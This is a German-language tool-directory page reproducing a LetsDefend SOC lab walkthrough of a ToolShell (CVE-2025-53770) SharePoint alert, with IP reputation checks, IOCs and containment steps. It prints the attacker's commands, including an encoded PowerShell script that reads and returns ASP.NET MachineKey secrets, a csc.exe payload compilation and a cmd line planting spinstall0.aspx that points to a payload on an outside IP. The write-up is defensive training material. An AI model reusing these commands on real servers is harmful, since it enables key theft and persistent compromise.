Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Management von Indicators of Compromise (IOC)SchwachstellenanalyseExploitationWebanwendungs-ExploitationMalware-AnalyseDigitale ForensikPenetrationstestsBedrohungsanalyseLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Incident Response
Labs & Praxis
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Detaillierter Walkthrough der Ausnutzung von CVE-2025-53770 (ToolShell) SharePoint Zero-Day, einschließlich RCE-Analyse, MachineKey-Exfiltration, Payload-Kompilierung, Web-Shell-Bereitstellung und Incident-Response-Eindämmungsschritte.

Repository anzeigen
3vor 11 MonatenNoch nicht geprüft
Teilen

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Einleitung

Ich habe mich im LetsDefend-Labor mit einem SharePoint-Zero-Day namens ToolShell (CVE-2025-53770) befasst. Ich habe einen realen Zero-Day-Angriff nachgestellt, bei dem eine bösartige POST-Anfrage die Authentifizierung umging, PowerShell ausführte, um MachineKeySection-Schlüssel zu stehlen, payload.exe kompilierte und eine Webshell (spinstall0.aspx) ablegte. Ich habe alles protokolliert, das Verhalten analysiert und den Host isoliert. Dieses README behandelt die Angriffsprozesse, die Schritte zur Eindämmung des Angriffs und die gewonnenen Erkenntnisse.

Labor-Überblick

  • Plattform: LetsDefend Cyber Range
  • Ziel: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Zielsetzung: RCE analysieren, Erkennung und Eindämmung üben

Verwendete Tools:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

Die Warnung

Bild

Dies ist eine kritische Warnung und verdächtige Aktivität, die auf die ToolPane.aspx von MS SharePoint mit großem Payload und gespooftem Referer abzielte. Der CVE-Kontext ist mit CVE-2025-53770 verknüpft. Es handelt sich um eine kritische SharePoint-Schwachstelle, die über eine speziell präparierte POST-Anfrage ausgenutzt wird, die nicht authentifizierten Angreifern Zugriff ermöglichte. Die erfolgreiche Ausnutzung führte zur Remote-Codeausführung (RCE) auf dem Server. Ich habe dies als aktiv und mit hoher Dringlichkeit behandelt und gehe von einer möglichen erfolgreichen Kompromittierung aus, bis das Gegenteil bewiesen ist.

SharePoint kurz erklärt

Microsoft SharePoint ist eine Plattform für die Zusammenarbeit in Unternehmen und die Dokumentenverwaltung — im Wesentlichen ein sicherer, organisierter Knotenpunkt für Dateien, Workflows und interne Webanwendungen.

Kernfunktionen

  • Dokumentenverwaltung: Versionskontrolle, Audit-Trails und Dateiberechtigungen
  • Zusammenarbeit: Mehrere Benutzer können Dokumente gemeinsam bearbeiten und teilen
  • Intranet / Portale: Interne Nachrichten, HR-Richtlinien, Dashboards
  • Workflows & Automatisierung: Formulare, Genehmigungen und Benachrichtigungen
  • Integration: Verbindet sich mit Teams, Outlook, Office-Apps und Power BI

Sicherheitsaspekte von SharePoint

  • Verwendet Active Directory oder SSO zur Authentifizierung
  • Daten werden im Ruhezustand und während der Übertragung verschlüsselt
  • Webparts und Layouts können bei falscher Konfiguration missbraucht werden
  • Regelmäßiges Patchen ist entscheidend, um sich gegen Zero-Day-Exploits zu verteidigen

Was ist CVE-2025-53770 (ToolShell)

Ein kritischer Zero-Day in Microsoft SharePoint Server, der es Angreifern ermöglicht, ohne Authentifizierung Code aus der Ferne auszuführen. Er missbraucht unsichere Deserialisierung und wird oft mit anderen SharePoint-Schwachstellen (CVE-2025-49704, CVE-2025-49706) für die vollständige Übernahme des Systems kombiniert. Bewertet mit CVSS 9.8 (Kritisch) und aktiv in freier Wildbahn ausgenutzt.

Angriffsanalyse mit VirusTotal

Ich habe die IP-Adresse des Absenders (Quell-IP-Adresse) mit VirusTotal analysiert. Quell-IP-Adresse: 107.191.58.76 Bild

Daraus kann ich ersehen, dass 15/95 Sicherheitsanbieter diese IP-Adresse als bösartig eingestuft haben, was bereits viel über die IP aussagt.

IP-Standort

Jetzt muss ich den Standort der IP ermitteln. Dies wurde mit Hilfe von AbuseIPDB durchgeführt, und wie unten gezeigt, ist die IP bekannt für Hacking, Brute-Force, Web-App-Angriffe, Portscans und DNS-Vergiftung.

Bild

Endpunkt-Analyse

Als SOC-Analyst, der diesen Fall bearbeitet, ist einer der wichtigsten Schritte die Endpunkt-Analyse. Ich habe auf der Endpoint-Security nach dem Host mit dem Namen "SharePoint01" gesucht, da die IP für Hacking bekannt ist, für weitere Analysen.

Bild

Nachdem ich den Host gefunden hatte, habe ich den Terminalverlauf aufgerufen, um die Befehlszeile zu prüfen.

Bild

| Terminalverlauf-Befehlszeile

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyksDQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

PowerShell-Flags: -nop -w hidden -e

  • -nop = Kein Profil (vermeidet Profilskripte).
  • -w hidden = Fenster verborgen starten (Stealth).
  • -e = codierter Befehl

Befehlszeilen-Erkenntnisse mit Base64-Decoder:

Aufgrund des Payloads habe ich den Base64-Decoder verwendet, um den Befehl zu dekodieren, wie unten gezeigt:

Bild

Der Benutzer startete PowerShell aus dem Systemverzeichnis "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" und mit codierten Befehlen ein serverseitiges C#-Skript für ASP.NET.

  • Verwendet Reflektion, um die System.Web-Assembly zu laden,
  • Greift auf die nicht-öffentliche MachineKeySection zu und ruft eine nicht-öffentliche Methode (GetApplicationConfig) auf,
  • Liest die MachineKey-Werte der Webanwendung (ValidationKey, DecryptionKey usw.),
  • Schreibt diese Schlüssel in die HTTP-Antwort (d. h. exfiltriert sie).

Erfassen von Payloads und Post-Exploitation-Aktivitäten: / _layouts/15/ToolPane.aspx?...

Der Payload versucht, den ASP.NET-MachineKey des Hosts zu lesen und weiterzugeben — ein Geheimnis, das verwendet werden kann, um ViewState-/Deserialisierungs-Token zu fälschen und Authentifizierungs-Bypass sowie Remote-Codeausführung zu ermöglichen. Dies entspricht dem ToolShell-Ausbeutungsmuster (MachineKey-Missbrauch). Wichtige Indikatoren für eine Kompromittierung (IoCs) im Befehl unter Verwendung von Base64-Dekodierung und -Kodierung:

  • Die POST-Anfrage + großer Payload + dieser codierte Befehl deuten darauf hin, dass der Angreifer wahrscheinlich versucht hat, ein solches serverseitiges Skript über den ToolShell-Exploit-Pfad zu erstellen oder auszuführen.
  • Machine-Exposure (Offenlegung) und Warnung wurden ausgelöst: Die Verwendung von -encodedCommand + verstecktem Fenster + Base64-Payload deutet auf Umgehung und automatisierte Ausnutzung hin. Angreifer verwenden häufig -encodedCommand, um Payloads zu verstecken und Erkennungs-/Befehlszeilen-Protokollierungsmuster zu vermeiden. Dies ermöglicht es einem Angreifer, bösartige ViewStates oder serialisierte Payloads zu erstellen, die die Anwendung als gültig akzeptiert, was Authentifizierungs-Bypass und Remote-Codeausführung auf anfälligen SharePoint-Instanzen ermöglicht. Für ToolShell (CVE-2025-53770) ist dies genau die Ausbeutungskette.

CMD-Ausführung & Ausnutzung

Der Angreifer versuchte, auf private Konfiguration zuzugreifen, und zielt darauf ab, .NET zu missbrauchen. Aus dem Base64-Decoder können wir System.Web.Configuration.MachineKeySection und GetApplicationConfig ersehen: MachineKeySection enthält:

  • Den ValidationKey der Maschine/Anwendung
  • Den DecryptionKey der Maschine/Anwendung.

Diese Schlüssel sind Geheimnisse, die zum Schutz von ViewState und Formularauthentifizierung verwendet werden. Ihr Abruf ist ein direkter Versuch, Material zu erlangen, das das Fälschen/Validieren serialisierter ASP.NET-Payloads ermöglicht → direkte Voraussetzung für Deserialisierungs-basierte RCE.

Erkenntnisse aus den CMD-Befehlen:

Nur DREI Sekunden später, wie oben gezeigt, sendete der Angreifer einen weiteren Befehl:

Bild

| Terminalverlauf-Befehlszeile

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

Erkenntnisse

  • Der Befehl zeigt einen C#-Compiler (csc.exe), der mit dem .NET-Framework geliefert wird. Seine Aufgabe ist es, Quellcode (.cs-Dateien) zu nehmen und in eine .NET-Assembly zu kompilieren, normalerweise .exe oder .dll.
  • Der Angreifer hat eine C#-Quelldatei (payload.cs) auf dem Opfer-Host hochgeladen oder erstellt und dann den integrierten .NET-Compiler (csc.exe) verwendet, um sie in eine Windows-ausführbare Datei (payload.exe) zu kompilieren. Bei diesem Payload könnte es sich um Malware handeln.

Weitere Erkenntnisse aus den CMD-Befehlen:

Nur ZWEI Sekunden später, wie oben gezeigt, sendete der Angreifer einen weiteren Befehl:

Bild

| Terminalverlauf-Befehlszeile

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

Erkenntnisse

  • Der Angreifer verwendete cmd.exe, um eine neue ASPX-Datei (spinstall0.aspx) im LAYOUTS-Verzeichnis von SharePoint zu erstellen, indem er ein HTML-Formular/Objekt in diesen Pfad schrieb.
  • Das injizierte ASPX enthält ein mit Url="http://107.191.58.76/payload.exe", das den Server oder einen Besucher auf diesen entfernten Payload verweist.
  • Die Ablage der Datei unter ...\TEMPLATE\LAYOUTS\ macht sie über die SharePoint-Webanwendung verfügbar (eine persistente, webbasierte Hintertür/Dropper).
  • Dies deutet auf einen versuchten Remote-Versand bzw. eine versuchte Remote-Ausführung von payload.exe vom angreiferkontrollierten Host (107.191.58.76) hin und ist ein klares Zeichen für Kompromittierung und eine Persistenzbedrohung.
  • Weitere Erkenntnisse aus den CMD-Befehlen:

    Nur FÜNF Sekunden später, wie oben gezeigt, sendete der Angreifer einen weiteren Befehl:

    Bild

    | Terminalverlauf-Befehlszeile

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    Erkenntnisse

    • Führte erneut PowerShell aus, um System.Web.Configuration.MachineKeySection.GetApplicationConfig() aufzurufen, das die MachineKey-Konfiguration der Anwendung liest.
    • Dadurch werden der ValidationKey/DecryptionKey abgerufen, die zum Signieren/Verschlüsseln von ViewState und Authentifizierungs-Tokens verwendet werden — Material, das ein Angreifer zum Fälschen serialisierter Payloads und zum Umgehen der Authentifizierung nutzen kann.
    • Dies ist ein klarer, konsistenter Aufklärungs-/Exfiltrationsschritt in einer ToolShell-ähnlichen Exploit-Kette (Vorbereitung für RCE), der manuell ausgeführt wurde.

    Diese Aktivitäten zeigen ein konsistentes Muster. Ich behandle dies als Kompromittierung mit hoher Konfidenz und habe sofort forensische Artefakte gesammelt.

    Threat Intelligence

    Nachdem ich alle Befehle und Erkenntnisse gesammelt hatte, habe ich weitere Recherchen in der Threat Intelligence durchgeführt und nach dem Datentyp IP gesucht. Die Datenquelle zeigt OnlyHunt und TAG CVE-2025-53770, und mit Referer: /_layouts/SignOut.aspx für den Untersuchungskanal der Warnungen wird deutlich, dass es sich um ein legitimes SharePoint handelt, das gespooft oder verwendet und später von SharePoint abgemeldet wurde, um den Anschein zu erwecken, dass es von einer normalen SharePoint-Aktion stammte. Zu diesem Zeitpunkt habe ich den Host isoliert.

    Bild

    IOC (Artefakte)

    • IP 107.191.58.76: Quell-IP des Angreifers, die beim Senden des Exploit-POST beobachtet wurde
    • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: Typ "url". Exploit-Endpunkt, der durch POST angegriffen wurde
    • Spinstall0.aspx: Typ "filename". Name der bereitgestellten bösartigen ASPX-Hintertür
    • MachineKeySection: Typ "string". ASPX-Codestring, der auf MachineKey-Exfiltration hinweist

    Meine Analyse-Notiz und Zusammenfassung

    Analysten-Notiz — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

    Datum/Uhrzeit: 2025-07-22 13:07 (Ereignis) Analyst: [IhrName] Fall-ID: SOC342 Host: SharePoint01 Schweregrad: Kritisch

    Zusammenfassung

    Ich entdeckte am 2025-07-22 um 13:07 einen kritischen Angriffsversuch zur Ausnutzung einer Zero-Day-Schwachstelle namens ToolShell (CVE-2025-53770) auf einem lokalen SharePoint-Server mit dem Hostnamen SharePoint01. Der Angreifer, der von einer bekannten bösartigen IP (107.191.58.76) stammt — der Quelle des POST und des Payload-Hosts — umging die Authentifizierung, um Remote-Code auf dem Server auszuführen. Der Angreifer hat spinstall0.aspx im SharePoint-LAYOUTS-Verzeichnis hochgeladen/erstellt und PowerShell ausgeführt, um ASP.NET-MachineKey-Material zu lesen und einen C#-Payload über csc.exe zu kompilieren. Dadurch konnte er vertrauenswürdige Payloads erstellen. Diese Aktivität ist konsistent mit der Bereitstellung einer Webshell mit spinstall0.aspx in SharePoint, der MachineKey-Exfiltration und der Kompilierung des Payloads auf dem Host — alles Indikatoren mit hoher Konfidenz für eine Kompromittierung.

    Aktualisierung meiner Playbook-Analysten-Notiz

    Bild Bild

    Empfohlene Schritte zur Eindämmung der Angreiferaktivitäten:

    Nach der Entdeckung der Kompromittierung habe ich in der Analysten-Notiz die folgenden Schritte empfohlen:

    1. Eindämmen: Falls autorisiert, SharePoint01 vom Netzwerk isolieren; wenn nicht, ausgehende Egress-Beschränkungen aufrechterhalten und Angreifer-IPs/-Cluster blockieren.
    2. Suchen: Alle SharePoint-Instanzen durchsuchen und angemessene Backups sicherstellen.
    3. Beseitigen: Bestätigte bösartige Dateien und nicht autorisierte geplante Aufgaben/Dienste entfernen; nach zusätzlicher Persistenz suchen.
    4. Abschwächen: ASP.NET-/MachineKey-Werte rotieren und die Microsoft-Notfall-Patches vom Juli 2025 auf allen lokalen SharePoint-Instanzen anwenden. Die Rotation mit den Anwendungsbesitzern koordinieren.
    5. Erkennen & Verhindern: Erkennungsregeln bereitstellen/hinzufügen und die Umgebung nach ähnlichen Aktivitäten durchsuchen.
Tool herunterladen